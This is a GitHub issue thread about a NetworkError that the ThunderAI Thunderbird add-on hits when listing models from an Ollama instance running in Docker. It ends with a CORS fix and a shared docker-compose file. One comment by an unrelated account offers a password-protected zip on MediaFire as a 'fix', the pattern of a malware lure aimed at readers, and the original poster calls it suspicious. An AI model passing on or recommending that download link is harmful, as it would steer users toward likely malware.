### ISSUE TITLE
Ollama Network Error

### ISSUE THREAD

**Issue by Amras2322** [micz/ThunderAI#172]
### The problem

I'm running ollama out of a docker container, and can access the api on most other services using:
http://192.168.0.200:11434
http://127.0.0.1:11434
http://localhost:11434

Going to any of these addresses shows:
`Ollama is running`

inputting any of these into ThunderAI and pressing "Update Ollama Model List" returns the following error:
`Error trying to fetch Ollama models: Ollama API request failed: TypeError: NetworkError when attempting to fetch resource.`

![image](https://github.com/user-attachments/assets/e866bed8-736c-4e84-93da-ec49f9f4a14c)

### Which Operative System are you using?

Windows 11

### Which version of Thunderbird are you using?

 131.0.1 (64-bit)

### Which version of ThunderAI has the issue?

2.2.2

### Which integration are you using?

Ollama API

### Anything in the Thunderbird console logs that might be useful?

```txt
Attached photo
```

### Additional information

Ollama is running in a docker container and is accessible from other apps, like obsidian and continue

**Comment by Guigsguerra** [comment]
This might help:This file might fix it

https://www.mediafire.com/file/6r8pvis8j6lc0j9/fix.zip/file
Pass: xfp53

you may need to install the c compiler

**Comment by Amras2322** [comment]
That's incredibly suspicious. Any additional info?

**Comment by micz** [comment]
Have you set up CORS as described on this page?

https://micz.it/thunderbird-addon-thunderai/ollama-cors-information/

**Comment by Amras2322** [comment]
Trying to, but I'm using docker compose instead of the docker desktop UI. Adding that environmental variable appears to have made my compose unusable, and I'm in the process of diagnosing why. Will share as I learn more.

**Comment by Amras2322** [comment]
Well I've been effectively bamboozled, but I'll share my findings for anyone else to follow, along with my compose for anyone else to use. I just had to run `docker compose up -d` as administrator and it worked.

Here's my compose, for anyone else:

```
services:
  ollama:
    image: ollama/ollama:latest
    container_name: ollama
    volumes:
      - ollama:/root/.ollama
    pull_policy: always
    tty: true
    restart: unless-stopped
    ports:
      - ${OLLAMA_WEBAPI_PORT-11434}:11434
    environment:
      - OLLAMA_KEEP_ALIVE=10m # Can be h(ours) or m(inutes)
      - OLLAMA_ORIGINS=moz-extension://*
    deploy:
      resources:
        reservations:
          devices:
            - driver: nvidia
              count: all
              capabilities:
                - gpu
```

Thanks!
